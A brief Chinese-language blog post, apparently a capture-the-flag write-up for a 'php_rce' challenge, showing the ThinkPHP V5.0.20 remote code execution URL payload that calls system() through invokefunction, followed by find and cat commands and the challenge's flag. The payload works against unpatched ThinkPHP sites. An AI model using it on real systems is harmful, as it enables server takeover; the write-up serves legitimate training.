thinkPHP_V5漏洞
2023-03-29 23:03:03
255
{{single.collect_count}}

php_rce攻防世界:

百度thinkphpv5,查询到其存在过漏洞

在网页中随便注入,可观察到其版本为V5.0.20

再上旬该版本漏洞,描述为:

只要在url后添加

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= (+操作)即可进入后台

进行 find / -name flag* 搜索

找到最后一行的flag

再进行 cat /tty/ttyS30/flags /sys/devices/platform/serial8250/tty/ttyS31/flags /flag /flag

获取到flag{thinkphp5_rce}

回帖
全部回帖({{commentCount}})
{{item.user.nickname}} {{item.user.group_title}} {{item.friend_time}}
{{item.content}}
{{item.comment_content_show ? '取消' : '回复'}} 删除
回帖
{{reply.user.nickname}} {{reply.user.group_title}} {{reply.friend_time}}
{{reply.content}}
{{reply.comment_content_show ? '取消' : '回复'}} 删除
回帖
收起
没有更多啦~
{{commentLoading ? '加载中...' : '查看更多评论'}}